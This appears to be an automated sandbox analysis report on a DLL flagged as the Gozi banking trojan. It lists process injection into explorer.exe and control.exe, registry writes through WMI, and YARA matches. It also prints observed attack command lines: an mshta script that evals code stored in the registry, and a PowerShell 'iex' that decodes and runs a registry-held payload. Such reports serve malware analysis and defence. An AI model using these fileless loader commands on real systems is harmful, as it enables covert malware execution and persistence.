Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Writes registry values via WMI
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Contains functionality to call native functions
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_001C34D0 NtMapViewOfSection, 1_2_001C34D0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_001C4F73 GetProcAddress,NtCreateSection,memset, 1_2_001C4F73
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_001C11A9 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 1_2_001C11A9
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_001CB159 NtQueryVirtualMemory, 1_2_001CB159
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00E5CCD9 RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA, 1_2_00E5CCD9
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00E75868 memcpy,memcpy,memcpy,NtUnmapViewOfSection,NtClose,memset, 1_2_00E75868
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00E60D8D memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64, 1_2_00E60D8D
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00E5E529 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread, 1_2_00E5E529
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00E6C6FE NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 1_2_00E6C6FE
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00E72AAC NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64, 1_2_00E72AAC
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00E55E8A NtQueryInformationProcess, 1_2_00E55E8A
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00E65E21 GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA, 1_2_00E65E21
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00E6FFF2 GetProcAddress,NtCreateSection,memset, 1_2_00E6FFF2
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00E577B0 NtMapViewOfSection, 1_2_00E577B0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00E58F6D NtAllocateVirtualMemory,NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError, 1_2_00E58F6D
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00E5F314 NtWriteVirtualMemory,NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError, 1_2_00E5F314
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00E5A818 NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW, 1_2_00E5A818
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00E605FC NtQueryInformationThread,GetLastError,RtlNtStatusToDosError, 1_2_00E605FC
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00E53934 OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle, 1_2_00E53934
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00E64518 NtGetContextThread,RtlNtStatusToDosError, 1_2_00E64518
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00E5E6C4 memset,NtQueryInformationProcess, 1_2_00E5E6C4
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00E52A0A NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError, 1_2_00E52A0A
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00E72E10 NtQuerySystemInformation,RtlNtStatusToDosError, 1_2_00E72E10
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00E617CD memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError, 1_2_00E617CD
Source: C:\Windows\System32\control.exe Code function: 34_2_001BC130 NtWriteVirtualMemory, 34_2_001BC130
Source: C:\Windows\System32\control.exe Code function: 34_2_001BF9A4 NtAllocateVirtualMemory, 34_2_001BF9A4
Source: C:\Windows\System32\control.exe Code function: 34_2_001A1A9C NtQueryInformationProcess, 34_2_001A1A9C
Source: C:\Windows\System32\control.exe Code function: 34_2_001B9B4C NtQueryInformationProcess, 34_2_001B9B4C
Source: C:\Windows\System32\control.exe Code function: 34_2_001A2BD8 NtSetInformationProcess,CreateRemoteThread,ResumeThread,FindCloseChangeNotification, 34_2_001A2BD8
Source: C:\Windows\System32\control.exe Code function: 34_2_0019C458 RtlAllocateHeap,NtSetContextThread,NtUnmapViewOfSection,NtClose, 34_2_0019C458
Source: C:\Windows\System32\control.exe Code function: 34_2_001B9584 NtReadVirtualMemory, 34_2_001B9584
Source: C:\Windows\System32\control.exe Code function: 34_2_0019F640 NtQueryInformationToken,NtQueryInformationToken,NtClose, 34_2_0019F640
Source: C:\Windows\System32\control.exe Code function: 34_2_001B1EEC NtCreateSection, 34_2_001B1EEC
Source: C:\Windows\System32\control.exe Code function: 34_2_001AEF14 NtMapViewOfSection, 34_2_001AEF14
Source: C:\Windows\System32\control.exe Code function: 34_2_001D1004 NtProtectVirtualMemory,NtProtectVirtualMemory, 34_2_001D1004
Source: C:\Windows\explorer.exe Code function: 37_2_03B62BD8 NtSetInformationProcess,CreateRemoteThread,ResumeThread, 37_2_03B62BD8
Source: C:\Windows\explorer.exe Code function: 37_2_03B79B4C NtQueryInformationProcess, 37_2_03B79B4C
Source: C:\Windows\explorer.exe Code function: 37_2_03B7F9A4 NtAllocateVirtualMemory, 37_2_03B7F9A4
Source: C:\Windows\explorer.exe Code function: 37_2_03B7C130 NtWriteVirtualMemory, 37_2_03B7C130
Source: C:\Windows\explorer.exe Code function: 37_2_03B6EF14 NtMapViewOfSection, 37_2_03B6EF14
Source: C:\Windows\explorer.exe Code function: 37_2_03B71EEC NtCreateSection, 37_2_03B71EEC
Source: C:\Windows\explorer.exe Code function: 37_2_03B5F640 NtQueryInformationToken,NtQueryInformationToken,NtClose,NtClose, 37_2_03B5F640
Source: C:\Windows\explorer.exe Code function: 37_2_03B79584 NtReadVirtualMemory, 37_2_03B79584
Source: C:\Windows\explorer.exe Code function: 37_2_03B51C74 NtQuerySystemInformation, 37_2_03B51C74
Source: C:\Windows\explorer.exe Code function: 37_2_03B5C458 NtSetContextThread,NtUnmapViewOfSection, 37_2_03B5C458
Source: C:\Windows\explorer.exe Code function: 37_2_03B91004 NtProtectVirtualMemory,NtProtectVirtualMemory, 37_2_03B91004
Contains functionality to launch a process as a different user
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00E52410 CreateProcessAsUserW, 1_2_00E52410
Detected potential crypto function
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_001C28E9 1_2_001C28E9
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_001CAF34 1_2_001CAF34
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00E6808E 1_2_00E6808E
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00E6BC93 1_2_00E6BC93
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00E7086C 1_2_00E7086C
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00E73C5C 1_2_00E73C5C
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00E64804 1_2_00E64804
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00E71669 1_2_00E71669
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00E62678 1_2_00E62678
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00E5BBA1 1_2_00E5BBA1
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00E6CFA3 1_2_00E6CFA3
Source: C:\Windows\System32\control.exe Code function: 34_2_001A5890 34_2_001A5890
Source: C:\Windows\System32\control.exe Code function: 34_2_001A6B80 34_2_001A6B80
Source: C:\Windows\System32\control.exe Code function: 34_2_0019C458 34_2_0019C458
Source: C:\Windows\System32\control.exe Code function: 34_2_001AE808 34_2_001AE808
Source: C:\Windows\System32\control.exe Code function: 34_2_001BE038 34_2_001BE038
Source: C:\Windows\System32\control.exe Code function: 34_2_001A2854 34_2_001A2854
Source: C:\Windows\System32\control.exe Code function: 34_2_001A386C 34_2_001A386C
Source: C:\Windows\System32\control.exe Code function: 34_2_001A206C 34_2_001A206C
Source: C:\Windows\System32\control.exe Code function: 34_2_001BE09C 34_2_001BE09C
Source: C:\Windows\System32\control.exe Code function: 34_2_001978F0 34_2_001978F0
Source: C:\Windows\System32\control.exe Code function: 34_2_001949BC 34_2_001949BC
Source: C:\Windows\System32\control.exe Code function: 34_2_001A11DC 34_2_001A11DC
Source: C:\Windows\System32\control.exe Code function: 34_2_001BFA10 34_2_001BFA10
Source: C:\Windows\System32\control.exe Code function: 34_2_001B6A28 34_2_001B6A28
Source: C:\Windows\System32\control.exe Code function: 34_2_001B0294 34_2_001B0294
Source: C:\Windows\System32\control.exe Code function: 34_2_001942CC 34_2_001942CC
Source: C:\Windows\System32\control.exe Code function: 34_2_001AAACC 34_2_001AAACC
Source: C:\Windows\System32\control.exe Code function: 34_2_001A0304 34_2_001A0304
Source: C:\Windows\System32\control.exe Code function: 34_2_00192B40 34_2_00192B40
Source: C:\Windows\System32\control.exe Code function: 34_2_001B2BD8 34_2_001B2BD8
Source: C:\Windows\System32\control.exe Code function: 34_2_0019EBD0 34_2_0019EBD0
Source: C:\Windows\System32\control.exe Code function: 34_2_001B53D4 34_2_001B53D4
Source: C:\Windows\System32\control.exe Code function: 34_2_001A3BF4 34_2_001A3BF4
Source: C:\Windows\System32\control.exe Code function: 34_2_001B9C04 34_2_001B9C04
Source: C:\Windows\System32\control.exe Code function: 34_2_001A3438 34_2_001A3438
Source: C:\Windows\System32\control.exe Code function: 34_2_001B1C68 34_2_001B1C68
Source: C:\Windows\System32\control.exe Code function: 34_2_001BD468 34_2_001BD468
Source: C:\Windows\System32\control.exe Code function: 34_2_0019DC88 34_2_0019DC88
Source: C:\Windows\System32\control.exe Code function: 34_2_001974A8 34_2_001974A8
Source: C:\Windows\System32\control.exe Code function: 34_2_001A44FC 34_2_001A44FC
Source: C:\Windows\System32\control.exe Code function: 34_2_00199514 34_2_00199514
Source: C:\Windows\System32\control.exe Code function: 34_2_001A1D14 34_2_001A1D14
Source: C:\Windows\System32\control.exe Code function: 34_2_001A7500 34_2_001A7500
Source: C:\Windows\System32\control.exe Code function: 34_2_00191D20 34_2_00191D20
Source: C:\Windows\System32\control.exe Code function: 34_2_001B0D40 34_2_001B0D40
Source: C:\Windows\System32\control.exe Code function: 34_2_001BED7C 34_2_001BED7C
Source: C:\Windows\System32\control.exe Code function: 34_2_0019559C 34_2_0019559C
Source: C:\Windows\System32\control.exe Code function: 34_2_001B75B4 34_2_001B75B4
Source: C:\Windows\System32\control.exe Code function: 34_2_001B15A0 34_2_001B15A0
Source: C:\Windows\System32\control.exe Code function: 34_2_001B7DDC 34_2_001B7DDC
Source: C:\Windows\System32\control.exe Code function: 34_2_001ABE9C 34_2_001ABE9C
Source: C:\Windows\System32\control.exe Code function: 34_2_001A2F1C 34_2_001A2F1C
Source: C:\Windows\System32\control.exe Code function: 34_2_001A4F5C 34_2_001A4F5C
Source: C:\Windows\System32\control.exe Code function: 34_2_001AEF7C 34_2_001AEF7C
Source: C:\Windows\System32\control.exe Code function: 34_2_00193F98 34_2_00193F98
Source: C:\Windows\System32\control.exe Code function: 34_2_001BEFD0 34_2_001BEFD0
Source: C:\Windows\System32\control.exe Code function: 34_2_001A97C8 34_2_001A97C8
Source: C:\Windows\explorer.exe Code function: 37_2_03B66B80 37_2_03B66B80
Source: C:\Windows\explorer.exe Code function: 37_2_03B542CC 37_2_03B542CC
Source: C:\Windows\explorer.exe Code function: 37_2_03B6AACC 37_2_03B6AACC
Source: C:\Windows\explorer.exe Code function: 37_2_03B65890 37_2_03B65890
Source: C:\Windows\explorer.exe Code function: 37_2_03B67500 37_2_03B67500
Source: C:\Windows\explorer.exe Code function: 37_2_03B63438 37_2_03B63438
Source: C:\Windows\explorer.exe Code function: 37_2_03B5C458 37_2_03B5C458
Source: C:\Windows\explorer.exe Code function: 37_2_03B63BF4 37_2_03B63BF4
Source: C:\Windows\explorer.exe Code function: 37_2_03B753D4 37_2_03B753D4
Source: C:\Windows\explorer.exe Code function: 37_2_03B5EBD0 37_2_03B5EBD0
Source: C:\Windows\explorer.exe Code function: 37_2_03B72BD8 37_2_03B72BD8
Source: C:\Windows\explorer.exe Code function: 37_2_03B60304 37_2_03B60304
Source: C:\Windows\explorer.exe Code function: 37_2_03B52B40 37_2_03B52B40
Source: C:\Windows\explorer.exe Code function: 37_2_03B70294 37_2_03B70294
Source: C:\Windows\explorer.exe Code function: 37_2_03B76A28 37_2_03B76A28
Source: C:\Windows\explorer.exe Code function: 37_2_03B7FA10 37_2_03B7FA10
Source: C:\Windows\explorer.exe Code function: 37_2_03B549BC 37_2_03B549BC
Source: C:\Windows\explorer.exe Code function: 37_2_03B611DC 37_2_03B611DC
Source: C:\Windows\explorer.exe Code function: 37_2_03B7E09C 37_2_03B7E09C
Source: C:\Windows\explorer.exe Code function: 37_2_03B578F0 37_2_03B578F0
Source: C:\Windows\explorer.exe Code function: 37_2_03B7E038 37_2_03B7E038
Source: C:\Windows\explorer.exe Code function: 37_2_03B6E808 37_2_03B6E808
Source: C:\Windows\explorer.exe Code function: 37_2_03B6386C 37_2_03B6386C
Source: C:\Windows\explorer.exe Code function: 37_2_03B6206C 37_2_03B6206C
Source: C:\Windows\explorer.exe Code function: 37_2_03B62854 37_2_03B62854
Source: C:\Windows\explorer.exe Code function: 37_2_03B53F98 37_2_03B53F98
Source: C:\Windows\explorer.exe Code function: 37_2_03B7EFD0 37_2_03B7EFD0
Source: C:\Windows\explorer.exe Code function: 37_2_03B697C8 37_2_03B697C8
Source: C:\Windows\explorer.exe Code function: 37_2_03B62F1C 37_2_03B62F1C
Source: C:\Windows\explorer.exe Code function: 37_2_03B6EF7C 37_2_03B6EF7C
Source: C:\Windows\explorer.exe Code function: 37_2_03B64F5C 37_2_03B64F5C
Source: C:\Windows\explorer.exe Code function: 37_2_03B6BE9C 37_2_03B6BE9C
Source: C:\Windows\explorer.exe Code function: 37_2_03B775B4 37_2_03B775B4
Source: C:\Windows\explorer.exe Code function: 37_2_03B715A0 37_2_03B715A0
Source: C:\Windows\explorer.exe Code function: 37_2_03B5559C 37_2_03B5559C
Source: C:\Windows\explorer.exe Code function: 37_2_03B77DDC 37_2_03B77DDC
Source: C:\Windows\explorer.exe Code function: 37_2_03B51D20 37_2_03B51D20
Source: C:\Windows\explorer.exe Code function: 37_2_03B59514 37_2_03B59514
Source: C:\Windows\explorer.exe Code function: 37_2_03B61D14 37_2_03B61D14
Source: C:\Windows\explorer.exe Code function: 37_2_03B7ED7C 37_2_03B7ED7C
Source: C:\Windows\explorer.exe Code function: 37_2_03B70D40 37_2_03B70D40
Source: C:\Windows\explorer.exe Code function: 37_2_03B574A8 37_2_03B574A8
Source: C:\Windows\explorer.exe Code function: 37_2_03B5DC88 37_2_03B5DC88
Source: C:\Windows\explorer.exe Code function: 37_2_03B644FC 37_2_03B644FC
Source: C:\Windows\explorer.exe Code function: 37_2_03B79C04 37_2_03B79C04
Source: C:\Windows\explorer.exe Code function: 37_2_03B71C68 37_2_03B71C68
Source: C:\Windows\explorer.exe Code function: 37_2_03B7D468 37_2_03B7D468
PE file does not import any functions
Source: idzehqcm.dll.32.dr Static PE information: No import functions for PE file found
Source: jnnfehtw.dll.28.dr Static PE information: No import functions for PE file found
Searches for the Microsoft Outlook file path
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Tries to load missing DLLs
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: sfc.dll
Source: C:\Windows\System32\RuntimeBroker.exe Section loaded: msfte.dll
Source: C:\Windows\System32\RuntimeBroker.exe Section loaded: mstracer.dll
Uses 32bit PE files
Source: SecuriteInfo.com.Generic.mg.3964ec2fe493ed56.dll Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
Yara signature match
Source: 00000025.00000002.578433552.0000000003B8E000.00000004.00000001.sdmp, type: MEMORY Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
Source: 00000027.00000002.570719578.000001E7666AE000.00000004.00000001.sdmp, type: MEMORY Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
Source: 00000022.00000003.422060985.0000021EAC2F0000.00000004.00000001.sdmp, type: MEMORY Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
Source: 0000001A.00000003.422165478.0000028E65B80000.00000004.00000001.sdmp, type: MEMORY Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
Source: 00000025.00000003.432265518.0000000003070000.00000004.00000001.sdmp, type: MEMORY Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
Source: 00000026.00000002.574832418.000002413CA4E000.00000004.00000001.sdmp, type: MEMORY Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
Source: 00000025.00000000.437313666.0000000003B8E000.00000004.00000001.sdmp, type: MEMORY Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
Source: 00000025.00000002.589013804.00000000066DE000.00000004.00000001.sdmp, type: MEMORY Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
Source: 00000022.00000002.474554725.00000000001CE000.00000004.00000001.sdmp, type: MEMORY Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
Source: SecuriteInfo.com.Generic.mg.3964ec2fe493ed56.dll Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: classification engine Classification label: mal100.bank.troj.evad.winDLL@30/156@13/4
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_001C31DD CreateToolhelp32Snapshot,Process32First,Process32Next,FindCloseChangeNotification, 1_2_001C31DD
Source: C:\Program Files\internet explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{FC0EA453-7035-11EB-90E5-ECF4BB570DC9}.dat
Source: C:\Windows\System32\control.exe Mutant created: \Sessions\1\BaseNamedObjects\{F267487C-A9A6-F4BF-C346-ED68A7DA711C}
Source: C:\Windows\SysWOW64\regsvr32.exe Mutant created: \Sessions\1\BaseNamedObjects\{EE061CAF-7521-5044-6F02-79841356BDF8}
Source: C:\Windows\System32\RuntimeBroker.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4288:120:WilError_01
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\{6A2E9FEC-C18A-2CE5-9B3E-8520FF528954}
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6204:120:WilError_01
Source: C:\Program Files\internet explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Temp\~DF514DA3B5643F29A2.TMP
Source: SecuriteInfo.com.Generic.mg.3964ec2fe493ed56.dll Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Program Files\internet explorer\iexplore.exe File read: C:\Users\desktop.ini
Source: C:\Windows\System32\loaddll32.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: SecuriteInfo.com.Generic.mg.3964ec2fe493ed56.dll ReversingLabs: Detection: 13%
Source: regsvr32.exe String found in binary or memory: EmailAddressCollection/EmailAddress[%u]/Address
Source: unknown Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.3964ec2fe493ed56.dll'
Source: unknown Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.3964ec2fe493ed56.dll
Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 'C:\Program Files\Internet Explorer\iexplore.exe'
Source: unknown Process created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4308 CREDAT:17410 /prefetch:2
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4308 CREDAT:82962 /prefetch:2
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4308 CREDAT:82968 /prefetch:2
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4308 CREDAT:17432 /prefetch:2
Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>'
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
Source: unknown Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\jnnfehtw\jnnfehtw.cmdline'
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES7BB2.tmp' 'c:\Users\user\AppData\Local\Temp\jnnfehtw\CSC5C15B44BFF13433EA0F7DE991C56E45D.TMP'
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\idzehqcm\idzehqcm.cmdline'
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES9024.tmp' 'c:\Users\user\AppData\Local\Temp\idzehqcm\CSCED83507F240441029C9C6A47F2CB5CFA.TMP'
Source: unknown Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.3964ec2fe493ed56.dll
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 'C:\Program Files\Internet Explorer\iexplore.exe'
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4308 CREDAT:17410 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4308 CREDAT:82962 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4308 CREDAT:82968 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4308 CREDAT:17432 /prefetch:2
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\jnnfehtw\jnnfehtw.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\idzehqcm\idzehqcm.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES7BB2.tmp' 'c:\Users\user\AppData\Local\Temp\jnnfehtw\CSC5C15B44BFF13433EA0F7DE991C56E45D.TMP'
